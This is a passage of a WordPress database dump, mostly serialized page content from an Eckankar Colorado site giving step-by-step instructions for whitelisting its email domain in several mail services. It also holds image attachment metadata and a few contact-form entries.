style=\"font-size: 14pt\">AOL doesn’t have a traditional email whitelist. Instead, it considers all mail addresses a user has in their address book to be trustworthy. This means that the contact list in AOL essentially serves the same purpose as a normal whitelist.</span></p>\r\n<ol>\r\n	<li><span style=\"font-size: 14pt\">Log in to your AOL account</span></li>\r\n	<li><span style=\"font-size: 14pt\">Open Contacts from the left navigation pane</span></li>\r\n	<li><span style=\"font-size: 14pt\">Click the New Contact icon and enter the required information</span></li>\r\n	<li><span style=\"font-size: 14pt\">Click the Add Contact button located at the bottom</span></li>\r\n</ol>\r\n<p> </p>\r\n<p><strong><span style=\"font-size: 18pt;color: #23507d\">If the email you wish to whitelist has already been sent to spam:</span></strong></p>\r\n<div class=\"pcontent\">\r\n<p><span style=\"font-size: 14pt\">1. Open the <b>Spam</b> folder.</span></p>\r\n<p><span style=\"font-size: 14pt\">2. Select the email.</span></p>\r\n<p><span style=\"font-size: 14pt\">3. Check the box to the left of the email.</span></p>\r\n<p><span style=\"font-size: 14pt\">4. Click <b>Ok </b>on<b> </b>the top toolbar to move the message into your inbox.  Future messages from this sender will be delivered to the inbox.</span></p>\r\n</div>\";}i:1;a:4:{s:15:\"accordion_title\";s:33:\"Comcast/Xfinity - Whitelist Email\";s:20:\"accordion_title_icon\";s:9:\"fa-laptop\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:4358:\"<p><span style=\"color: #23507d\"><strong><span style=\"font-size: 18pt\">How To Whitelist An Email In Comcast/Xfinity Mail</span></strong></span></p>\r\n<p><strong><span style=\"font-size: 14pt\">There are a few methods to whitelist email addresses in Comcast Mail. You can also whitelist the entire Eckankar Colorado domain by using a filter.</span></strong></p>\r\n<p><span style=\"font-size: 14pt\">Sign in to your Comcast account online to accomplish these tasks<br />\r\n</span></p>\r\n<p><span style=\"font-size: 14pt\"><strong>Method #1</strong>: Check your Spam Folder to see if any legitimate email was marked as Spam by accident and use the toolbar to mark it Not Spam.</span></p>\r\n<p><span style=\"font-size: 14pt\"><strong>Method #2</strong>: </span><br />\r\n<span style=\"font-size: 14pt\">Sometimes fixing the delivery issue can be as easy as adding the email address to the contacts list. For example, add state.vahana@eckankar-colorado.org and any other relevant ECK email addresses to your contacts list. (directions below)</span></p>\r\n<ol>\r\n	<li><span style=\"font-size: 14pt\">Select \'Address Book\'</span></li>\r\n	<li><span style=\"font-size: 14pt\">Click \'New\', then \'New Contact\'</span></li>\r\n	<li><span style=\"font-size: 14pt\">Enter state.vahana@eckankar-colorado.org and click \'Save\'</span></li>\r\n</ol>\r\n<p> </p>\r\n<p><span style=\"font-size: 14pt\"><strong>Method #3</strong>:</span> <br />\r\n<strong><span style=\"font-size: 18pt;color: #23507d\">Whitelist the entire Eckankar Colorado domain using a comcast email filter - this will allow all emails from Eckankar in Colorado to be whitelisted.<br />\r\n<br />\r\n</span></strong></p>\r\n<p><span style=\"font-size: 14pt\">1. Sign into your Comcast/Xfinity Email account from a computer</span></p>\r\n<p><span style=\"font-size: 14pt\">2. Select the <strong>Gear</strong> icon on the top-right of the navigation bar</span></p>\r\n<p><span style=\"font-size: 14pt\">3. Select <strong>Email Settings</strong>.</span></p>\r\n<p><img class=\"alignnone size-full wp-image-267799\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/comcast-1a.jpg\" alt=\"\" width=\"235\" height=\"350\" /></p>\r\n<p> </p>\r\n<p><span style=\"font-size: 14pt\">4. Select <strong>Filter Rules</strong> on the left</span></p>\r\n<p><span style=\"font-size: 14pt\">5. Select the<strong> Add New Rule</strong> button</span></p>\r\n<p><img class=\"alignnone size-full wp-image-267800\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/comcast-2.jpg\" alt=\"\" width=\"1629\" height=\"425\" /></p>\r\n<p><br />\r\n<span style=\"font-size: 14pt\">6. Enter a name for the filter in the Rule name field (this can be any name you wish)</span></p>\r\n<p><img class=\"alignnone size-full wp-image-267801\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/comcast-3.jpg\" alt=\"\" width=\"1002\" height=\"801\" /></p>\r\n<p><br />\r\n<span style=\"font-size: 14pt\">7. Under Conditions, select <strong>Add Condition</strong></span><br />\r\n<span style=\"font-size: 14pt\">8. Choose <strong>Sender/From</strong></span></p>\r\n<p><img class=\"alignnone size-full wp-image-267803\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/comcast-3b.jpg\" alt=\"\" width=\"1005\" height=\"823\" /></p>\r\n<p> </p>\r\n<p><span style=\"font-size: 14pt\">9. Choose <strong>Is exactly</strong> if you know the one exact email address you want to add, or select <strong>Contains</strong> if you want to whitelist the domain - eckankar-colorado.org.<br />\r\n</span></p>\r\n<p><span style=\"font-size: 14pt\">10. In the <strong>Text Field</strong>, enter the email address (if you selected “<em>is exactly</em>”) or the ECK domain (if you selected “<em>contains</em>”)</span></p>\r\n<p><img class=\"alignnone size-full wp-image-267802\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/comcast-4.jpg\" alt=\"\" width=\"1006\" height=\"804\" /></p>\r\n<p> </p>\r\n<p><span style=\"font-size: 14pt\">11. Under Actions, select <strong>Add action</strong></span></p>\r\n<p><span style=\"font-size: 14pt\">12. Select <strong>Move to folder</strong></span></p>\r\n<p><img class=\"alignnone size-full wp-image-267804\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/comcast-5.jpg\" alt=\"\" width=\"1000\" height=\"813\" /></p>\r\n<p><br />\r\n<br />\r\n<span style=\"font-size: 14pt\">13. Select <strong>Inbox</strong> as the folder</span><br />\r\n<span style=\"font-size: 14pt\">14. Select <strong>Save</strong></span></p>\";}i:2;a:4:{s:15:\"accordion_title\";s:23:\"Gmail - Whitelist Email\";s:20:\"accordion_title_icon\";s:9:\"fa-laptop\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:3317:\"<section class=\"\">\r\n<p><span style=\"font-size: 18pt\"><strong><span style=\"font-family: arial, helvetica, sans-serif\"><span style=\"color: #23507d\">How To Whitelist An Email In Gmail</span><br />\r\n</span></strong></span></p>\r\n<p><span style=\"font-size: 14pt\">1. Log into <strong>Gmail</strong></span><br />\r\n<span style=\"font-size: 14pt\">2. Click the \'<strong>Settings</strong>\' button on the top right</span><br />\r\n<span style=\"font-size: 14pt\">3. You will see the option to see all settings. Click \'<strong>See All Settings</strong>\'</span></p>\r\n<p><img class=\"alignnone size-full wp-image-267792\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/gmail-01B.jpg\" alt=\"\" width=\"358\" height=\"353\" /></p>\r\n<p><br />\r\n<span style=\"font-size: 14pt\">4. You will be taken to a new screen</span><br />\r\n<span style=\"font-size: 14pt\">5. A new ribbon menu will be shown, click \'<strong>Filters and Blocked Addresses</strong>\'<br />\r\n6. </span><span style=\"font-size: 14pt\">Click \'<strong>Create a new filter</strong>\'</span></p>\r\n<p><img class=\"alignnone size-full wp-image-267787\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/gmail-1.jpg\" alt=\"\" width=\"1298\" height=\"385\" /></p>\r\n<p><br />\r\n<span style=\"font-size: 14pt\">A new tile will popup. You now have the option to whitelist an entire domain or a specific email. We recommend that you whitelist the entire eckankar-colorado.org domain. This will tell Gmail to approve all emails from Colorado Eckankar</span></p>\r\n<p><span style=\"font-size: 14pt\">If you prefer, you can whitelist only specific email addresses. To whitelist only a single Eckankar email address, type the entire address instead of simply the domain address.</span></p>\r\n<p><span style=\"font-size: 14pt\">7. When finished entering your whitelist preference, click \'<strong>Create filter</strong>\'</span></p>\r\n<p><img class=\"alignnone size-full wp-image-267788\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/gmail-2.jpg\" alt=\"\" width=\"740\" height=\"378\" /></p>\r\n<p><br />\r\n<span style=\"font-size: 14pt\">A new tile will popup, select \'<strong>Never send it to spam</strong>\' - then click \'<strong>Create filter</strong>\'</span></p>\r\n<p><img class=\"alignnone size-full wp-image-267789\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/gmail-3.jpg\" alt=\"\" width=\"740\" height=\"570\" /></p>\r\n<p> </p>\r\n<p><span style=\"font-size: 14pt\">Below we see the completed Gmail filter</span></p>\r\n<p><img class=\"alignnone size-full wp-image-267790\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/gmail-4.jpg\" alt=\"\" width=\"1362\" height=\"450\" /></p>\r\n</section>\r\n<p> </p>\r\n<p> </p>\r\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 18pt;color: #23507d\">Whitelisting in Gmail Mobile App</span></p>\r\n<section class=\"block-padding-bottom-60-mobile-32 content\">\r\n<ol>\r\n	<li><span style=\"font-size: 14pt\">Open the Gmail application.</span></li>\r\n	<li><span style=\"font-size: 14pt\">Navigate to Spam or Junk Folder.</span></li>\r\n	<li><span style=\"font-size: 14pt\">Click on the message you wish to view.</span></li>\r\n	<li><span style=\"font-size: 14pt\">Select the option \"Report not spam\".</span></li>\r\n	<li><span style=\"font-size: 14pt\">You will now receive messages from this sender as normal.</span></li>\r\n</ol>\r\n<p> </p>\r\n</section>\";}i:3;a:4:{s:15:\"accordion_title\";s:43:\"Hotmail, Windows, and MSN - Whitelist Email\";s:20:\"accordion_title_icon\";s:9:\"fa-laptop\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:1390:\"<p><span style=\"color: #1d5791;font-size: 18pt\"><strong>To whitelist us in Hotmail, Windows, and MSN, you can add our email address to your Safe List:</strong></span></p>\r\n<ol>\r\n	<li><span style=\"font-size: 14pt\">Select Options from the top right (next to More Options)</span></li>\r\n	<li><span style=\"font-size: 14pt\">Select Safe and Blocked Senders</span></li>\r\n	<li><span style=\"font-size: 14pt\">Select Safe Senders</span></li>\r\n	<li><span style=\"font-size: 14pt\">In the space provided, you can either enter a specific email address such as our newsletter address (eck.temple.co@eckankar-colorado.org) or better yet, use *eckankar-colorado.org or @eckankar-colorado.org to whitelist the whole Eckankar in Colorado domain.</span></li>\r\n	<li><span style=\"font-size: 14pt\">Select Add.</span></li>\r\n	<li><span style=\"font-size: 14pt\">Ensure the safe list box has the address you entered, and select OK.</span></li>\r\n</ol>\r\n<p><span style=\"color: #1d5791\"><strong><span style=\"font-size: 16pt\">You can also add Eckankar in Colorado email address\'s to your contact list:</span></strong></span></p>\r\n<ol>\r\n	<li><span style=\"font-size: 14pt\">Open the most recent email sent through us.</span></li>\r\n	<li><span style=\"font-size: 14pt\">Select the Save Address button (to the right in the line of options above the email).</span></li>\r\n	<li><span style=\"font-size: 14pt\">Click OK.</span></li>\r\n</ol>\";}i:4;a:4:{s:15:\"accordion_title\";s:40:\"Outlook Desktop Client - Whitelist Email\";s:20:\"accordion_title_icon\";s:9:\"fa-laptop\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:2270:\"<p><span style=\"color: #23507d\"><strong><span style=\"font-size: 18pt;font-family: arial, helvetica, sans-serif\">How To Whitelist An Email In Outlook</span></strong></span></p>\r\n<p><span style=\"font-size: 14pt\"><br />\r\n1. Click <strong>Home</strong> &gt; <strong>Junk</strong> &gt; <strong>Junk E-mail Options</strong></span></p>\r\n<p><span style=\"font-size: 14pt\"><img class=\"alignnone size-full wp-image-267793\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/outlook-1.jpg\" alt=\"\" width=\"483\" height=\"302\" /></span></p>\r\n<p> </p>\r\n<p><span style=\"font-size: 14pt\">2. In the <strong>\'Junk E-mail Options</strong>\' dialog, click the \'<strong>Safe Senders</strong>\' tab</span></p>\r\n<p><span style=\"font-size: 14pt\">3. Click the \'<strong>Add</strong>\' button</span></p>\r\n<p><img class=\"alignnone size-full wp-image-267794\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/outlook-2.jpg\" alt=\"\" width=\"500\" height=\"633\" /></p>\r\n<p style=\"padding-left: 40px\"><span style=\"font-size: 14pt\">You now have the option to whitelist an entire domain or a specific email. <em>We recommend that you whitelist the entire eckankar-colorado.org domain</em>. This will tell Outlook to approve all emails from Colorado Eckankar</span></p>\r\n<p style=\"padding-left: 40px\"><span style=\"font-size: 14pt\">If you prefer, you can whitelist only specific email addresses. To whitelist only a single Eckankar email address, type the entire address - such as contact@eckankar-colorado.org.</span></p>\r\n<p><span style=\"font-size: 14pt\">4. Enter the Colorado Eckankar domain or individual ECK email address that you would like to whitelist</span></p>\r\n<p style=\"padding-left: 40px\"><strong><span style=\"font-size: 14pt\">Notes:</span></strong><br />\r\n<span style=\"font-size: 14pt\"><strong>(1)</strong> If you check the \'Also trust e-mail from my Contacts\' option, your addresses in Contacts will be considered safe senders.<br />\r\n</span><br />\r\n<span style=\"font-size: 14pt\"><strong>(2)</strong> If you want all people that you enter into your contacts list to be considered safe senders, check the \'Automatically add people I e-mail to the Safe Senders List\' option.</span></p>\r\n<p><br />\r\n<span style=\"font-size: 14pt\">5. Click the \'<strong>OK</strong>\' button</span></p>\";}i:5;a:4:{s:15:\"accordion_title\";s:43:\"Outlook Online Web Client - Whitelist Email\";s:20:\"accordion_title_icon\";s:9:\"fa-laptop\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:1382:\"<div>\r\n<p><span style=\"color: #1d5791\"><strong><span style=\"font-size: 18pt\">How to Whitelist Email Addresses in Outlook Web Client<br />\r\n<br />\r\n</span></strong></span></p>\r\n<ul>\r\n	<li><span style=\"font-size: 14pt\">Login to your account on the Outlook Live website</span></li>\r\n	<li><span style=\"font-size: 14pt\">Click the <strong>Gear</strong> icon In the top-right corner of the screen</span></li>\r\n	<li><span style=\"font-size: 14pt\">Select <strong>View all Outlook Settings</strong>.</span></li>\r\n</ul>\r\n<p> </p>\r\n<p><img class=\"\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/outlook-online-1.png\" alt=\"\" width=\"441\" height=\"818\" /></p>\r\n</div>\r\n\r\n<div style=\"margin-top: 30px\">\r\n<ul>\r\n	<li><span style=\"font-size: 14pt\">From the <strong>Mail Menu</strong> - Select <strong>Junk Email</strong></span></li>\r\n	<li><span style=\"font-size: 14pt\">Under <strong>Safe senders and domains</strong>, click <strong>Add</strong></span></li>\r\n	<li><span style=\"font-size: 14pt\">Enter the email address or domain you want to whitelist, and press<strong> Enter</strong>.</span></li>\r\n	<li><span style=\"font-size: 14pt\">Click <strong>Save</strong></span></li>\r\n</ul>\r\n<p><img class=\"aligncenter size-full wp-image-268017\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/for-adding-full-email-junk.png\" alt=\"\" width=\"1578\" height=\"640\" /></p>\r\n<p> </p>\r\n</div>\";}i:6;a:4:{s:15:\"accordion_title\";s:29:\"Proton Mail - Whitelist Email\";s:20:\"accordion_title_icon\";s:9:\"fa-laptop\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:1706:\"<p><strong><span style=\"font-size: 18pt;color: #23507d\">How To Whitelist An Email In Proton Mail</span></strong></p>\r\n<p><span style=\"font-size: 14pt\">ProtonMail users can whitelist email addresses by adding them to the ProtonMail allow list. </span></p>\r\n<p><span style=\"font-size: 14pt\">The allow list lets you specify individual email addresses or domains that won’t be filtered to your spam folder.</span></p>\r\n<p><strong><span style=\"font-size: 14pt\">To add a sender to your allow list:</span></strong></p>\r\n<p style=\"padding-left: 40px\"><span style=\"font-size: 14pt\">1. Log in to Proton Mail at mail.proton.me(new window).</span></p>\r\n<p style=\"padding-left: 40px\"><span style=\"font-size: 14pt\">2. Select Settings → Go to settings → Proton Mail → Filters → Spam, block, and allow lists.</span></p>\r\n<p style=\"padding-left: 40px\"><span style=\"font-size: 14pt\">3. Click the dropdown menu on the Add address or domain button, and select Allow.</span></p>\r\n<p><img class=\"aligncenter size-full wp-image-268979\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/09/image-1.webp\" alt=\"\" width=\"798\" height=\"501\" /></p>\r\n<p style=\"padding-left: 40px\"><span style=\"font-size: 14pt\">4. Choose either Email or Domain as the address type, enter the address or domain, and click Add address.</span></p>\r\n<p><img class=\"aligncenter size-full wp-image-268981\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/09/image-2.webp\" alt=\"\" width=\"592\" height=\"241\" /></p>\r\n<p><span style=\"font-size: 14pt\"><strong>For more on Proton spam, block, and allow lists - <a href=\"https://proton.me/support/spam-filtering\" target=\"_blank\" rel=\"noopener\">Go here</a></strong></span></p>\r\n<p>&nbsp;</p>\";}i:7;a:4:{s:15:\"accordion_title\";s:28:\"Yahoo Mail - Whitelist Email\";s:20:\"accordion_title_icon\";s:9:\"fa-laptop\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:1928:\"<section class=\"\"></section>\r\n<p><strong><span style=\"font-family: arial, helvetica, sans-serif;font-size: 18pt;color: #23507d\">How to Whitelist An Email In Yahoo</span></strong></p>\r\n<div>\r\n<article>\r\n<p><span style=\"font-size: 14pt\">In Yahoo Mail, you can whitelist by adding addresses to your Contacts list. To add an ECK address to your Yahoo Contacts:</span></p>\r\n<ol>\r\n	<li><span style=\"font-size: 14pt\">Open your Yahoo mailbox.</span></li>\r\n	<li><span style=\"font-size: 14pt\">Click the address book icon under the Yahoo! Mail logo. When you roll your mouse over it, it will say <strong>Contacts</strong></span></li>\r\n	<li><span style=\"font-size: 14pt\">Click \"<strong>New Contact</strong>\"</span></li>\r\n	<li><span style=\"font-size: 14pt\">Fill in the fields of your Contact</span></li>\r\n	<li><span style=\"font-size: 14pt\">Click <strong>Save</strong> and mail from this sender should now be delivered to your Inbox</span></li>\r\n</ol>\r\n<p> </p>\r\n<p><span style=\"font-size: 18pt;color: #23507d\"><strong>To whitelist all Colorado ECK addresses, you can use filters:</strong><br />\r\n</span></p>\r\n<p><span style=\"font-size: 18pt\"><strong>Create Filters</strong></span></p>\r\n<div class=\"\">\r\n<ol>\r\n	<li><span style=\"font-size: 14pt\">Point to <strong>Settings</strong> menu and click \'Settings\'</span></li>\r\n	<li><span style=\"font-size: 14pt\">Click <strong>Filters</strong> and then \'<strong>Add\'</strong></span></li>\r\n	<li><span style=\"font-size: 14pt\">Enter a <strong>Filter \'Name</strong>\'</span></li>\r\n	<li><span style=\"font-size: 14pt\">In <strong>Sender</strong>, type eckankar-colorado.org</span></li>\r\n	<li><span style=\"font-size: 14pt\">Select \'<strong>Inbox\'</strong> as the folder to deliver the email to</span></li>\r\n	<li><span style=\"font-size: 14pt\">Click \'<strong>Save\'</strong> and then click \'<strong>Save\'</strong> again.</span></li>\r\n</ol>\r\n</div>\r\n<div class=\"mc\" id=\"cont3\"></div>\r\n</article>\r\n</div>\r\n<p> </p>\";}i:8;a:4:{s:15:\"accordion_title\";s:27:\"Zoho Mail - Whitelist Email\";s:20:\"accordion_title_icon\";s:9:\"fa-laptop\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:770:\"<p><span style=\"font-size: 18pt;color: #23507d\">How To Whitelist An Email In ZOHO Mail</span></p>\r\n<ol>\r\n	<li><span style=\"font-size: 14pt\">Login to Zoho Mail</span></li>\r\n	<li><span style=\"font-size: 14pt\">Go to \'<strong>Settings\'</strong></span></li>\r\n	<li><span style=\"font-size: 14pt\">Navigate to \'<strong>Anti-Spam List\'</strong></span></li>\r\n	<li><span style=\"font-size: 14pt\">Click on the \'<strong>Email Address</strong> tab\'</span></li>\r\n	<li><span style=\"font-size: 14pt\">Click on \'<strong>Whitelist/Blacklist Emails\'</strong></span></li>\r\n	<li><span style=\"font-size: 14pt\">Click the \'<strong>Add New Whitelist</strong>\' email field</span></li>\r\n	<li><span style=\"font-size: 14pt\">Enter the address and press the \'<strong>Enter</strong>\' key</span></li>\r\n</ol>\";}}\";'),(176086,267776,'wpsm_accordion_count','9'),(176087,267776,'Accordion_Settings','s:635:\"a:18:{s:13:\"acc_sec_title\";s:3:\"yes\";s:10:\"op_cl_icon\";s:3:\"yes\";s:14:\"acc_title_icon\";s:3:\"yes\";s:10:\"acc_radius\";s:3:\"yes\";s:10:\"acc_margin\";s:3:\"yes\";s:15:\"acc_op_cl_align\";s:5:\"right\";s:13:\"enable_toggle\";s:2:\"no\";s:16:\"enable_ac_border\";s:3:\"yes\";s:13:\"expand_option\";s:1:\"3\";s:9:\"ac_styles\";s:1:\"2\";s:16:\"acc_title_bg_clr\";s:7:\"#e8e8e8\";s:18:\"acc_title_icon_clr\";s:7:\"#000000\";s:15:\"acc_desc_bg_clr\";s:7:\"#ffffff\";s:17:\"acc_desc_font_clr\";s:7:\"#000000\";s:10:\"title_size\";s:2:\"18\";s:8:\"des_size\";s:2:\"16\";s:11:\"font_family\";s:9:\"Open Sans\";s:10:\"custom_css\";s:63:\"#wpsm_accordion_267776 .ac_title_class {\r\n   color: #23507d;\r\n}\";}\";'),(176088,267776,'boldgrid_hide_page_title','0'),(176089,267776,'boldgrid_in_page_containers','0'),(177396,268013,'_wp_attached_file','2023/02/outlook-online-2-for-adding-domain.png'),(177397,268013,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1584;s:6:\"height\";i:570;s:4:\"file\";s:46:\"2023/02/outlook-online-2-for-adding-domain.png\";s:8:\"filesize\";i:38467;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:46:\"outlook-online-2-for-adding-domain-300x108.png\";s:5:\"width\";i:300;s:6:\"height\";i:108;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8566;}s:5:\"large\";a:5:{s:4:\"file\";s:47:\"outlook-online-2-for-adding-domain-1024x368.png\";s:5:\"width\";i:1024;s:6:\"height\";i:368;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:53171;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:46:\"outlook-online-2-for-adding-domain-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6464;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:46:\"outlook-online-2-for-adding-domain-768x276.png\";s:5:\"width\";i:768;s:6:\"height\";i:276;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36247;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:46:\"outlook-online-2-for-adding-domain-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18264;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:46:\"outlook-online-2-for-adding-domain-474x324.png\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25060;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:46:\"outlook-online-2-for-adding-domain-391x260.png\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19448;}s:8:\"tileview\";a:5:{s:4:\"file\";s:46:\"outlook-online-2-for-adding-domain-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:22578;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:47:\"outlook-online-2-for-adding-domain-1536x553.png\";s:5:\"width\";i:1536;s:6:\"height\";i:553;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:87065;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176113,267787,'_wp_attached_file','2023/02/gmail-1.jpg'),(176114,267787,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1298;s:6:\"height\";i:385;s:4:\"file\";s:19:\"2023/02/gmail-1.jpg\";s:8:\"filesize\";i:66639;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"gmail-1-300x89.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:89;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4327;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"gmail-1-1024x304.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:304;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32994;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"gmail-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3757;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"gmail-1-768x228.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:228;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20077;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:19:\"gmail-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11736;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:19:\"gmail-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17608;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:19:\"gmail-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12412;}s:8:\"tileview\";a:5:{s:4:\"file\";s:19:\"gmail-1-300x385.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16891;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(191776,269101,'_field_651','(720) 978-4090'),(191777,269101,'_field_656','The ECK Satsang Discourses  Fourth Series - STARTS IN NOVEMBER -- 1st Monday at 700 pm - Zoom'),(191778,269101,'_field_649',''),(191779,269101,'_form_id','61'),(191780,269101,'_seq_num','7'),(191781,269102,'_field_654','Sue'),(191782,269102,'_field_652','Smith'),(191783,269102,'_field_653','suesmith332@gmail.com'),(191459,269012,'original-file','2023/09/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops19bf20c1b7fea35185874310607373d2-updraft-pre-smush-original.jpg'),(176111,267786,'_wp_attached_file','2023/02/gmail-01.jpg'),(176112,267786,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:408;s:6:\"height\";i:402;s:4:\"file\";s:20:\"2023/02/gmail-01.jpg\";s:8:\"filesize\";i:18809;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"gmail-01-300x296.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:296;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9084;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"gmail-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3797;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:20:\"gmail-01-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9382;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:20:\"gmail-01-408x324.jpg\";s:5:\"width\";i:408;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13009;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:20:\"gmail-01-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10057;}s:8:\"tileview\";a:5:{s:4:\"file\";s:20:\"gmail-01-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10698;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176115,267788,'_wp_attached_file','2023/02/gmail-2.jpg'),(176116,267788,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:740;s:6:\"height\";i:378;s:4:\"file\";s:19:\"2023/02/gmail-2.jpg\";s:8:\"filesize\";i:33378;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"gmail-2-300x153.jpg\";s:5:\"width\";i:300;s:6:\"height\"